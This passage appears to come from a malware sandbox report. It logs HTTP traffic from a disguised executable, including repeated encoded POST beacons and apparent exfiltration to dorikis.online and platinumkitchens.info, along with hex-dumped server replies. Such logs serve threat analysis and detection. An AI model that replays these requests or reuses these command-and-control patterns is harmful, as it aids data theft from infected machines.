                                                                                                                                              Oct 4, 2024 08:08:46.709712982 CEST4115OUTData Raw: 75 75 34 58 32 5a 30 5a 61 63 4b 31 69 48 66 58 73 4a 72 61 68 6c 39 6e 54 5a 56 4a 58 50 56 76 67 78 34 68 78 38 6d 76 71 58 37 69 31 43 52 70 4f 7a 65 2f 46 38 6e 36 58 67 2b 59 70 6f 59 68 58 54 76 6e 58 4f 6c 44 54 4e 58 54 38 38 79 31 66 53
                                                                                                                                              Data Ascii: uu4X2Z0ZacK1iHfXsJrahl9nTZVJXPVvgx4hx8mvqX7i1CRpOze/F8n6Xg+YpoYhXTvnXOlDTNXT88y1fS3IHSuMvXuyya9Q1Y+RAIv9Fmy9kIgowMcCKRQ/zI40xgQP8sCy1GKRbUM4+2bTeuYqNfFx2OX5kWCuSgiWeYvzntaxlDKYoZLA1epzvw3X4okax953VdeAYb0F4wkbbZJjNBJsmsxr/2062+u73GWwePAFJ/w/DNd


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              29192.168.11.20497593.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:08:49.347965002 CEST549OUTGET /phvf/?oz=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.greekhause.org
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:08:49.454838991 CEST399INHTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:49 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 7a 3d 55 6f 6f 71 69 55 2b 75 69 58 52 70 68 6c 65 78 78 69 68 59 38 2b 70 52 32 70 31 71 53 61 43 47 52 73 4d 69 67 74 34 4d 47 70 41 2f 56 4b 56 79 58 6b 4c 38 71 79 65 69 66 56 57 49 31 51 66 39 49 62 4b 6a 6a 61 54 2b 4e 42 34 30 45 48 49 31 63 73 4f 77 38 62 45 48 38 72 76 35 58 67 50 70 73 48 69 6c 32 4a 34 77 35 4d 4a 4f 77 67 70 41 74 31 62 43 52 76 30 3d 26 55 4a 39 3d 71 4e 2d 6c 6c 54 4b 50 48 78 6e 74 50 72 76 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              30192.168.11.2049760162.213.249.216804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:08:54.777276039 CEST813OUTPOST /d84b/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dorikis.online
                                                                                                                                              Origin: http://www.dorikis.online
                                                                                                                                              Referer: http://www.dorikis.online/d84b/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 47 42 6b 33 4d 44 47 51 5a 51 48 43 36 68 50 34 43 49 6d 57 44 75 6e 79 47 71 30 4d 74 4c 6a 35 72 34 39 4e 49 45 76 78 59 36 2b 70 70 44 4a 37 45 78 32 30 43 39 55 55 62 71 46 76 4f 76 73 42 52 54 45 51 44 64 53 45 5a 46 61 42 41 4d 78 71 2b 59 4b 4d 42 43 53 68 67 50 6f 46 6a 41 46 59 47 69 50 76 59 6b 4d 54 30 46 7a 70 79 45 58 74 39 6c 31 76 48 56 34 79 63 59 73 72 50 47 4f 4e 71 68 74 77 43 37 46 50 31 41 79 76 36 48 65 53 68 71 35 37 41 61 39 30 7a 4f 44 67 76 38 43 35 70 51 67 51 68 65 32 63 38 4e 32 2f 6a 6f 46 6d 43 64 68 42 30 51 64 71 65 6a 38 57 77 48 54 72 5a 77 3d 3d
                                                                                                                                              Data Ascii: oz=GBk3MDGQZQHC6hP4CImWDunyGq0MtLj5r49NIEvxY6+ppDJ7Ex20C9UUbqFvOvsBRTEQDdSEZFaBAMxq+YKMBCShgPoFjAFYGiPvYkMT0FzpyEXt9l1vHV4ycYsrPGONqhtwC7FP1Ayv6HeShq57Aa90zODgv8C5pQgQhe2c8N2/joFmCdhB0Qdqej8WwHTrZw==
                                                                                                                                              Oct 4, 2024 08:08:54.961083889 CEST595INHTTP/1.1 404 Not Found
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:54 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Content-Length: 389
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              31192.168.11.2049761162.213.249.216804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:08:57.472019911 CEST833OUTPOST /d84b/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dorikis.online
                                                                                                                                              Origin: http://www.dorikis.online
                                                                                                                                              Referer: http://www.dorikis.online/d84b/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 47 42 6b 33 4d 44 47 51 5a 51 48 43 34 42 66 34 42 72 65 57 53 2b 6e 31 4a 4b 30 4d 36 62 6a 39 72 34 78 4e 49 47 44 62 59 50 4f 70 6e 43 35 37 46 7a 53 30 48 39 55 55 50 61 46 6d 52 66 73 61 52 54 35 74 44 66 57 45 5a 46 4f 42 41 49 31 71 2b 70 4b 4e 54 69 54 48 31 66 6f 44 74 67 46 59 47 69 50 76 59 6e 77 35 30 46 4c 70 7a 31 6e 74 73 77 56 6f 4c 31 34 31 62 59 73 72 4c 47 4f 42 71 68 73 56 43 35 78 70 31 43 61 76 36 46 47 53 68 62 35 38 4f 61 38 39 2f 65 44 77 69 63 62 56 6f 54 6f 74 77 4f 33 50 36 2b 71 57 6d 2b 55 38 66 76 56 6c 33 44 42 59 61 54 46 2b 79 46 53 77 45 37 2b 58 4f 43 78 65 2b 44 68 66 53 63 4e 38 73 64 59 53 41 72 49 3d
                                                                                                                                              Data Ascii: oz=GBk3MDGQZQHC4Bf4BreWS+n1JK0M6bj9r4xNIGDbYPOpnC57FzS0H9UUPaFmRfsaRT5tDfWEZFOBAI1q+pKNTiTH1foDtgFYGiPvYnw50FLpz1ntswVoL141bYsrLGOBqhsVC5xp1Cav6FGShb58Oa89/eDwicbVoTotwO3P6+qWm+U8fvVl3DBYaTF+yFSwE7+XOCxe+DhfScN8sdYSArI=
                                                                                                                                              Oct 4, 2024 08:08:57.660258055 CEST595INHTTP/1.1 404 Not Found
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:57 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Content-Length: 389
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              32192.168.11.2049762162.213.249.216804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:09:00.159516096 CEST2578OUTPOST /d84b/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dorikis.online
                                                                                                                                              Origin: http://www.dorikis.online
                                                                                                                                              Referer: http://www.dorikis.online/d84b/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 47 42 6b 33 4d 44 47 51 5a 51 48 43 34 42 66 34 42 72 65 57 53 2b 6e 31 4a 4b 30 4d 36 62 6a 39 72 34 78 4e 49 47 44 62 59 50 47 70 6e 30 74 37 46 54 75 30 41 39 55 55 4d 61 46 72 52 66 73 62 52 54 68 70 44 66 4c 78 5a 47 32 42 61 74 68 71 34 62 75 4e 5a 69 54 48 33 66 6f 47 6a 41 46 33 47 6b 76 72 59 6b 59 35 30 46 4c 70 7a 32 2f 74 38 56 31 6f 4e 31 34 79 63 59 73 76 50 47 4f 6c 71 68 31 6f 43 36 64 66 31 79 36 76 35 6c 57 53 79 4e 74 38 43 61 38 2f 2b 75 43 76 69 63 6e 4b 6f 54 45 62 77 4f 43 53 36 39 4b 57 6e 76 39 2f 4b 74 68 4f 75 54 5a 52 46 41 35 63 6b 45 71 53 4c 4a 4b 4b 4b 78 6f 72 32 56 6c 64 54 75 5a 4c 34 38 55 61 44 50 4c 52 76 71 4f 50 51 5a 39 4f 73 54 73 2b 64 72 32 4f 6f 45 57 70 6f 4f 39 55 34 70 4c 43 74 74 47 58 6b 32 4a 37 77 75 44 33 66 4a 67 77 66 6a 43 48 6a 37 71 4a 48 31 42 79 6b 69 6d 77 34 37 63 4d 65 49 72 76 71 76 4a 4f 6b 48 4f 52 5a 45 72 35 31 30 6d 42 38 30 37 6e 77 56 4d 57 71 76 33 49 4c 63 46 6b 53 7a 65 4e 4e 79 53 6f 39 53 74 39 33 30 75 4a 45 5a 6b [TRUNCATED]
                                                                                                                                              Data Ascii: oz=GBk3MDGQZQHC4Bf4BreWS+n1JK0M6bj9r4xNIGDbYPGpn0t7FTu0A9UUMaFrRfsbRThpDfLxZG2Bathq4buNZiTH3foGjAF3GkvrYkY50FLpz2/t8V1oN14ycYsvPGOlqh1oC6df1y6v5lWSyNt8Ca8/+uCvicnKoTEbwOCS69KWnv9/KthOuTZRFA5ckEqSLJKKKxor2VldTuZL48UaDPLRvqOPQZ9OsTs+dr2OoEWpoO9U4pLCttGXk2J7wuD3fJgwfjCHj7qJH1Bykimw47cMeIrvqvJOkHORZEr510mB807nwVMWqv3ILcFkSzeNNySo9St930uJEZkP5MxUYmDGtVBRKq5pS23LdUyvioCmtFk/NwkDkm71qzOjV1bX0X02hA0FBCHGnmdCp7Cg7dMdhOKbPkgJVXjsmhD5ehh43Ojvl7fLnVsvxUtlzeZ6DPGZsYxsYyQBVYwzQcyMWJqs1kPrfYwRld99CwvoBkDeIzb+wUID09j0RPr5GghUozDF/xOTzm4XQgXPULeAqSiVBqEHhIbC7Bu99FUFiLvwb6J6WNqN5md/XZRLsXPndFM2vcTlX0d8Qt8sS4huaCRKQLayv5CeL+JDFduaC1xmxlCCSCEkzxiJkcl/qw4V2EVvzdXD47FxFKJ7cvbjB7c9FzjTBJDFvT8pFWHwa0K88Iq2J+W3gqALF/kQ9FodBTgr3GqvhLrAaRlfMDqD3t+dvg1t/s9auPWb5rvEegqCnq6tr0dZp2IO7miwWY23JTdlQTIL+7QFXZNpv2p4Vlr5YDRla+mJthG5QNOVyq3NkA74f9E3DWwDhrtOf5I7kKantFcYNjXgz57gCpbNyTmLlHtAmQv30RvEiw2ztmi6d44txEGJ9Rm7PHMP2kjyZ7poKaAHML8kQu83P14S4tDm7BZIR0q3jOj3/nFNvyg33EzdovBH2owWiG/mkZxrE0ttftTtI5gcY3Z817dJOA4aSn0dPewtyP0uMnQGgXIbXjBMR [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:09:00.159600019 CEST5404OUTData Raw: 44 43 35 64 4b 69 6b 69 50 2f 41 2b 6e 33 4a 62 72 2f 6d 6d 62 66 55 2f 4e 39 5a 76 42 6e 37 72 76 5a 7a 49 78 59 58 44 55 61 30 30 30 4d 42 38 36 35 66 41 50 70 50 75 59 4f 54 39 38 39 49 79 62 78 39 44 6e 39 70 45 55 2f 78 6e 63 4d 2b 62 31 72
                                                                                                                                              Data Ascii: DC5dKikiP/A+n3Jbr/mmbfU/N9ZvBn7rvZzIxYXDUa000MB865fAPpPuYOT989Iybx9Dn9pEU/xncM+b1rAc1eAW2pwzC+vtYeyL9iiH47zyd6AsXVWBbbsGJmeDvH/zTcFMFZPoYdhQhjo06/7ndBMkokyu3uZSkDecSuGA+LlZQlGw4NUZ9rQjFelS4vSfbhcRyrEa0N0LBSIcxC0B5GO8o2O6xZno0U/qj/pxyLOJ8m18Uko
                                                                                                                                              Oct 4, 2024 08:09:00.342919111 CEST595INHTTP/1.1 404 Not Found
                                                                                                                                              Date: Fri, 04 Oct 2024 06:09:00 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Content-Length: 389
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              33192.168.11.2049763162.213.249.216804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:09:02.859702110 CEST549OUTGET /d84b/?oz=LDMXP2ida3jj6Wv8YbWYWcXQGJdr9fjlzYlCdzHaAPX6jElzFVuifqg0YZMPIM8JGTBjffDneHOFDPAe46iMAyLvyO9+lRB2GxTtOnRawDOQ6U7+wx9GICg=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dorikis.online
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:09:03.074490070 CEST610INHTTP/1.1 404 Not Found
                                                                                                                                              Date: Fri, 04 Oct 2024 06:09:02 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Content-Length: 389
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              34192.168.11.20497643.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:09:08.295380116 CEST834OUTPOST /qo4k/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.platinumkitchens.info
                                                                                                                                              Origin: http://www.platinumkitchens.info
                                                                                                                                              Referer: http://www.platinumkitchens.info/qo4k/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 36 34 69 4e 7a 57 38 6a 59 62 4e 37 33 35 39 77 55 49 75 65 33 56 38 61 6e 32 37 2f 76 46 62 66 67 6a 77 56 68 57 62 7a 37 30 63 52 32 50 5a 63 42 4a 7a 75 68 59 46 68 68 77 61 6d 41 32 49 6f 68 47 6a 57 42 56 52 55 76 55 34 7a 6b 39 38 68 74 67 6f 67 44 55 72 46 65 44 45 42 30 68 50 66 6f 65 33 4c 39 71 59 61 2b 77 55 71 74 36 56 34 57 57 46 6e 6c 50 6f 5a 79 68 52 56 6b 35 4d 4f 51 42 6f 39 73 46 4f 37 76 70 70 2b 77 53 54 39 56 62 48 2f 45 51 41 32 59 6a 79 58 50 37 74 57 42 75 41 75 58 55 57 39 42 34 59 63 69 59 53 67 38 58 45 48 51 47 2b 46 54 2f 6c 69 4a 2f 30 57 76 51 3d 3d
                                                                                                                                              Data Ascii: oz=64iNzW8jYbN7359wUIue3V8an27/vFbfgjwVhWbz70cR2PZcBJzuhYFhhwamA2IohGjWBVRUvU4zk98htgogDUrFeDEB0hPfoe3L9qYa+wUqt6V4WWFnlPoZyhRVk5MOQBo9sFO7vpp+wST9VbH/EQA2YjyXP7tWBuAuXUW9B4YciYSg8XEHQG+FT/liJ/0WvQ==


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              35192.168.11.20497653.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:09:10.923429966 CEST854OUTPOST /qo4k/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.platinumkitchens.info
                                                                                                                                              Origin: http://www.platinumkitchens.info
                                                                                                                                              Referer: http://www.platinumkitchens.info/qo4k/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
